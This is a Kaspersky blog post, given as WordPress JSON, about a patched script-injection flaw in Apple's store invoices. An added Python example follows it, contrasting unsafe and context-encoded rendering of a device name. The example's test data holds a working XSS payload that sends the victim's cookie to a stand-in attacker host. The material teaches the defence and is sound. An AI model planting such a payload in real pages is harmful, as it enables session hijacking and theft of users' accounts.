{"id":4337,"date":"2015-08-06T15:55:00","date_gmt":"2015-08-06T15:55:00","guid":{"rendered":"http:\/\/kasperskydaily.com\/b2b\/?p=4337"},"modified":"2019-11-15T07:02:53","modified_gmt":"2019-11-15T12:02:53","slug":"apple-invoice","status":"publish","type":"post","link":"https:\/\/www.kaspersky.com\/blog\/apple-invoice\/4337\/","title":{"rendered":"An invoice bug in Apple&#8217;s stores: a big trouble that passed by"},"content":{"rendered":"<p>Apple <a href=\"https:\/\/threatpost.com\/apple-patches-remote-invoice-vulnerability-in-itunes-app-store\/113989\" target=\"_blank\" rel=\"noopener nofollow\">patched<\/a> a serious issue in its App Store and iTunes Store, one that could have undermined many\u00a0of the businesses working in this ecosystem. A remote attacker could inject malicious script into invoices that came from Apple, which could then be used for session hijacking, phishing, and redirects.<\/p>\n<p>The vulnerability became public in late July, but Apple had apparently patched it about a month earlier \u2013 so the flaw is no longer present.<\/p>\n<p>The issue, an application-side input validation web vulnerability, came down to the fact that Apple\u2019s purchase invoices include the name of the user\u2019s device. According to Threatpost\u2019s <a href=\"https:\/\/threatpost.com\/apple-patches-remote-invoice-vulnerability-in-itunes-app-store\/113989\" target=\"_blank\" rel=\"noopener nofollow\">publication<\/a>, that name is a value the attacker controls and can seed with script code. 
User device names are usually arbitrary, but according to the security expert who discovered the bug, the App Store and iTunes take that device value and encode it \u201cwith the wrong conditions.\u201d<\/p>\n<p>This means that if an attacker put their code through Apple\u2019s invoicing system, the result would be application-side script code execution: after a purchase from either the App Store or iTunes, the invoice is sent to the target\u2019s email and the malicious code is triggered.<\/p>\n<p>The severity of this vulnerability was rated high. Aside from the proof of concept, there have been no reports of actual exploitation of the flaw, which is definitely good news.<\/p>\n<p>In general, Apple\u2019s software and its stores have a good reputation, security-wise. The company invests a lot of effort in security, even though <a href=\"https:\/\/www.kaspersky.com\/blog\/keyboard-spies-now-on-iphones\/\" target=\"_blank\" rel=\"noopener nofollow\">hiccups do occur<\/a>, albeit quite rarely.<\/p>\n<p>That\u2019s why the revelation of this bug is especially noteworthy. The possible attack would put at risk many businesses and individuals who have become comfortable assuming that nothing perilous comes from Apple\u2019s software and media stores. 
However, this particular bug shows that its infrastructure is not necessarily impeccable.<\/p>\n<p>This is a wide-scale problem, not limited to Apple\u2019s stores (cybercriminals would rather choose <a href=\"https:\/\/business.kaspersky.com\/android-financial-attacks-and-current-security-status\/3901\" target=\"_blank\" rel=\"noopener nofollow\">other systems than Apple\u2019s platforms<\/a>). So it is highly recommended to stay alert \u2013 always \u2013 and keep security solutions active at all times.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Apple patched a serious issue in its App Store and iTunes Store, which could have undermined many of the businesses working in this ecosystem.<\/p>\n","protected":false},"author":209,"featured_media":15336,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[1999,3052],"tags":[2329,14,27,268],"class_list":{"0":"post-4337","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-business","8":"category-smb","9":"tag-app-store","10":"tag-apple","11":"tag-itunes","12":"tag-vulnerabilities"},"hreflang":[{"hreflang":"x-default","url":"https:\/\/www.kaspersky.com\/blog\/apple-invoice\/4337\/"},{"hreflang":"en-au","url":"https:\/\/www.kaspersky.com.au\/blog\/apple-invoice\/4337\/"},{"hreflang":"en-za","url":"https:\/\/www.kaspersky.co.za\/blog\/apple-invoice\/4337\/"}],"acf":[],"banners":"","maintag":{"url":"https:\/\/www.kaspersky.com\/blog\/tag\/app-store\/","name":"App 
Store"},"_links":{"self":[{"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/posts\/4337","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/users\/209"}],"replies":[{"embeddable":true,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/comments?post=4337"}],"version-history":[{"count":2,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/posts\/4337\/revisions"}],"predecessor-version":[{"id":30435,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/posts\/4337\/revisions\/30435"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/media\/15336"}],"wp:attachment":[{"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/media?parent=4337"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/categories?post=4337"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.kaspersky.com\/blog\/wp-json\/wp\/v2\/tags?post=4337"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
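The bug class the post describes, a user-controlled device name written into an invoice with the wrong encoding, as an added Python example. This is not code from the post, from Threatpost, or from Apple: the invoice template, the purchase record, the attacker-chosen device name and the helper names (`render_invoice_unsafe`, `render_invoice_safe`, `contains_live_script`, `device_name_is_acceptable`) are all constructed for illustration. It assumes only what the post states, that the device name is reflected into the invoice, and shows the raw interpolation beside output encoding done per context (HTML text, quoted attribute, URL query).

```python
"""
Added example, not from the Kaspersky post or Apple's code: an attacker-
controlled device name interpolated into an invoice template without
encoding, beside the same template rendered with per-context encoding.
Template, purchase record and attacker string are constructed here.
"""
import html
import re
from urllib.parse import quote

# Constructed purchase record. The device name is the only user-controlled
# field; an attacker sets it on their own device before buying something.
PURCHASE = {
    "item": "Example App",
    "price": "$0.99",
    "device_name": '<script>document.location="https://attacker.example/?c='
                   '"+document.cookie</script>',
}

# Hypothetical invoice template. The device name is written into three
# different output contexts, and each one needs its own encoding:
#   {device}      HTML text (element content)
#   {device_q}    a URL query component inside href
#   {device_attr} a double-quoted attribute value
TEMPLATE = (
    "<html><body>"
    "<h1>Your receipt</h1>"
    "<p>Item: {item} - {price}</p>"
    "<p>Purchased on device: {device}</p>"
    '<a href="https://store.example/devices?name={device_q}" '
    'title="{device_attr}">Manage device</a>'
    "</body></html>"
)

# A real <script> open tag, as opposed to the escaped text "&lt;script".
SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)

DEVICE_NAME_MAX = 64


def render_invoice_unsafe(purchase):
    """The vulnerable pattern: the device name is interpolated verbatim into
    every context, so a name containing markup becomes live markup."""
    name = purchase["device_name"]
    return TEMPLATE.format(item=purchase["item"], price=purchase["price"],
                           device=name, device_q=name, device_attr=name)


def render_invoice_safe(purchase):
    """The fix: encode each value for the exact context it lands in."""
    name = purchase["device_name"]
    return TEMPLATE.format(
        item=html.escape(purchase["item"]),
        price=html.escape(purchase["price"]),
        device=html.escape(name),                   # HTML text context
        device_q=quote(name, safe=""),              # URL query component
        device_attr=html.escape(name, quote=True),  # quoted attribute value
    )


def contains_live_script(document):
    """Pre-send guard an invoicing pipeline could run: does the rendered HTML
    still contain a real <script> open tag? Escaped text does not match."""
    return SCRIPT_TAG.search(document) is not None


def device_name_is_acceptable(name):
    """Input-side check for the field itself: reject markup delimiters and
    control characters, but keep apostrophes and quotes, which are normal in
    device names ("O'Brien's iPhone"). Output encoding above is still
    required, because a valid name can still break a quoted attribute."""
    if not 1 <= len(name) <= DEVICE_NAME_MAX:
        return False
    return not any(ch in "<>" or ord(ch) < 32 for ch in name)


if __name__ == "__main__":
    unsafe = render_invoice_unsafe(PURCHASE)
    safe = render_invoice_safe(PURCHASE)
    print("unsafe render carries live script:", contains_live_script(unsafe))
    print("safe render carries live script:  ", contains_live_script(safe))
    print("device name passes input check:   ",
          device_name_is_acceptable(PURCHASE["device_name"]))
```

The point of keeping both an input check and per-context output encoding is that they catch different things: the input check stops an obviously hostile name at the edge, but a name such as `O'Brien's iPhone` is legitimate and still has to be attribute-encoded before it goes into `title="..."`, and a name that is fine in element content still has to be percent-encoded before it goes into a query string. Encoding "with the wrong conditions", as the researcher put it, is exactly the case where one of those contexts is missed.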